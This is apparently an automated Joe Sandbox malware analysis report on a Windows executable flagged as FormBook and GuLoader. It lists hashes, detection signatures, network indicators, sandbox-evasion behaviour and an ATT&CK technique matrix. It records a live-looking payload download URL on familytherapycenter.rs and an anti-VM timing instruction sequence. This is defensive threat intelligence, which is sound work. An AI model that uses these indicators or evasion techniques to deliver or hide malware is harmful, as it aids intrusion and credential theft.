Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5112024976.exe

Overview

General Information

Sample name:5112024976.exe
Analysis ID:1550109
MD5:35826e4e9e0db5ce7a5e95d34c34e2da
SHA1:f2aea3002a1529f56ea66478789037440702dfbd
SHA256:5a23c2b6db6ec6993f56e635a2958ed21bbf94c6920f2329fdcd9a8641ff9b6a
Infos:

Detection

FormBook, GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 5112024976.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\5112024976.exe" MD5: 35826E4E9E0DB5CE7A5E95D34C34E2DA)
    • 5112024976.exe (PID: 7904 cmdline: "C:\Users\user\Desktop\5112024976.exe" MD5: 35826E4E9E0DB5CE7A5E95D34C34E2DA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.3280941030.0000000036020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2358263323.0000000004980000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T13:54:50.594813+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449730TCP
      2024-11-06T13:55:29.444769+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449742TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T13:56:01.164190+010028032702Potentially Bad Traffic192.168.2.449907188.40.95.144443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 5112024976.exeAvira: detected
      Source: 5112024976.exeReversingLabs: Detection: 33%
      Source: Yara matchFile source: 00000004.00000002.3280941030.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: 5112024976.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.4:49907 version: TLS 1.2
      Source: 5112024976.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: 5112024976.exe, 00000004.00000002.3280971993.000000003651E000.00000040.00001000.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910457288.0000000036027000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2915598436.00000000361D8000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3280971993.0000000036380000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 5112024976.exe, 00000004.00000002.3280971993.000000003651E000.00000040.00001000.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910457288.0000000036027000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2915598436.00000000361D8000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3280971993.0000000036380000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49742
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49907 -> 188.40.95.144:443
      Source: global trafficHTTP traffic detected: GET /FWMRlymkKxgrni33.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /FWMRlymkKxgrni33.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: familytherapycenter.rs
      Source: 5112024976.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: 5112024976.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: 5112024976.exe, 00000004.00000001.2357387179.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: 5112024976.exe, 00000004.00000001.2357387179.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: 5112024976.exe, 00000004.00000002.3255854656.00000000061F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/
      Source: 5112024976.exe, 00000004.00000002.3256225311.00000000063F0000.00000004.00001000.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910678100.0000000006206000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910808035.0000000006206000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3255922586.0000000006207000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3255854656.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.bin
      Source: 5112024976.exe, 00000004.00000002.3255854656.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.binI8
      Source: 5112024976.exe, 00000004.00000002.3255854656.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.bini8a
      Source: 5112024976.exe, 00000004.00000002.3255854656.00000000061F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/J
      Source: 5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownHTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.4:49907 version: TLS 1.2

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000004.00000002.3280941030.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\5112024976.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Windows\resources\soenderbro.iniJump to behavior
      Source: 5112024976.exeStatic PE information: invalid certificate
      Source: 5112024976.exe, 00000004.00000002.3280971993.00000000364AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5112024976.exe
      Source: 5112024976.exe, 00000004.00000003.2910457288.000000003614A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5112024976.exe
      Source: 5112024976.exe, 00000004.00000003.2915598436.0000000036305000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5112024976.exe
      Source: 5112024976.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/10@5/1
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Users\user\AppData\Roaming\secretaryshipsJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Users\user\AppData\Local\Temp\nswE8E8.tmpJump to behavior
      Source: 5112024976.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\5112024976.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 5112024976.exeReversingLabs: Detection: 33%
      Source: C:\Users\user\Desktop\5112024976.exeFile read: C:\Users\user\Desktop\5112024976.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"
      Source: C:\Users\user\Desktop\5112024976.exeProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"
      Source: C:\Users\user\Desktop\5112024976.exeProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"Jump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: 5112024976.exeStatic file information: File size 1224768 > 1048576
      Source: 5112024976.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: 5112024976.exe, 00000004.00000002.3280971993.000000003651E000.00000040.00001000.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910457288.0000000036027000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2915598436.00000000361D8000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3280971993.0000000036380000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 5112024976.exe, 00000004.00000002.3280971993.000000003651E000.00000040.00001000.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910457288.0000000036027000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2915598436.00000000361D8000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3280971993.0000000036380000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2358263323.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Users\user\AppData\Local\Temp\nsbE9F2.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\5112024976.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\5112024976.exeAPI/Special instruction interceptor: Address: 4AD9C2F
      Source: C:\Users\user\Desktop\5112024976.exeAPI/Special instruction interceptor: Address: 3659C2F
      Source: C:\Users\user\Desktop\5112024976.exeRDTSC instruction interceptor: First address: 4AA2F57 second address: 4AA2F57 instructions: 0x00000000 rdtsc 0x00000002 test dh, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F9DA90CFBA3h 0x00000008 test cx, cx 0x0000000b inc ebp 0x0000000c cmp bl, al 0x0000000e inc ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\5112024976.exeRDTSC instruction interceptor: First address: 3622F57 second address: 3622F57 instructions: 0x00000000 rdtsc 0x00000002 test dh, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F9DA8C636C3h 0x00000008 test cx, cx 0x0000000b inc ebp 0x0000000c cmp bl, al 0x0000000e inc ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\5112024976.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbE9F2.tmp\System.dllJump to dropped file
      Source: 5112024976.exe, 00000004.00000003.2910808035.000000000620F000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3255922586.000000000620F000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000003.2910678100.000000000620F000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.3255854656.00000000061B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\5112024976.exeProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"Jump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000004.00000002.3280941030.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000004.00000002.3280941030.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      File and Directory Discovery
      Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager21
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared Drive13
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      5112024976.exe33%ReversingLabs
      5112024976.exe100%AviraHEUR/AGEN.1361137
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsbE9F2.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://familytherapycenter.rs/J0%Avira URL Cloudsafe
      https://familytherapycenter.rs/FWMRlymkKxgrni33.bin0%Avira URL Cloudsafe
      https://familytherapycenter.rs/0%Avira URL Cloudsafe
      https://familytherapycenter.rs/FWMRlymkKxgrni33.binI80%Avira URL Cloudsafe
      https://familytherapycenter.rs/FWMRlymkKxgrni33.bini8a0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      familytherapycenter.rs
      188.40.95.144
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://familytherapycenter.rs/FWMRlymkKxgrni33.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd5112024976.exe, 00000004.00000001.2357387179.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
          high
          http://www.ftp.ftp://ftp.gopher.5112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
            high
            https://familytherapycenter.rs/J5112024976.exe, 00000004.00000002.3255854656.00000000061F5000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd5112024976.exe, 00000004.00000001.2357387179.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              high
              https://familytherapycenter.rs/FWMRlymkKxgrni33.bini8a5112024976.exe, 00000004.00000002.3255854656.00000000061B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_Error5112024976.exefalse
                high
                http://nsis.sf.net/NSIS_ErrorError5112024976.exefalse
                  high
                  https://familytherapycenter.rs/5112024976.exe, 00000004.00000002.3255854656.00000000061F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://familytherapycenter.rs/FWMRlymkKxgrni33.binI85112024976.exe, 00000004.00000002.3255854656.00000000061B8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2145112024976.exe, 00000004.00000001.2357387179.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    188.40.95.144
                    familytherapycenter.rsGermany
                    24940HETZNER-ASDEfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1550109
                    Start date and time:2024-11-06 13:53:37 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 6s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:5112024976.exe
                    Detection:MAL
                    Classification:mal84.troj.evad.winEXE@3/10@5/1
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: 5112024976.exe
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    188.40.95.144Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                      Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          familytherapycenter.rsAnfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          HETZNER-ASDEAnfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          getscreen-868841125.exeGet hashmaliciousUnknownBrowse
                          • 78.47.165.25
                          getscreen-868841125.exeGet hashmaliciousUnknownBrowse
                          • 78.47.165.25
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          DeGrsOm654.exeGet hashmaliciousQuasarBrowse
                          • 195.201.57.90
                          PO_11000262.vbsGet hashmaliciousFormBookBrowse
                          • 148.251.114.233
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          NTU #U5831#U50f9#U8acb#U6c42#U9805#U76ee FMD2024UOS#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 188.40.95.144
                          2024-11-05-5910184618-5910184618-fs#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 188.40.95.144
                          Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.40.95.144
                          JkYvyHHOr8.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 188.40.95.144
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsbE9F2.tmp\System.dllAnfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                            Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                21st OCTOBER 2024 234876sdf ORDER_PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  21st OCTOBER 2024 234876sdf ORDER_PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):11264
                                        Entropy (8bit):5.7711167426271945
                                        Encrypted:false
                                        SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                        MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                        SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                        SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
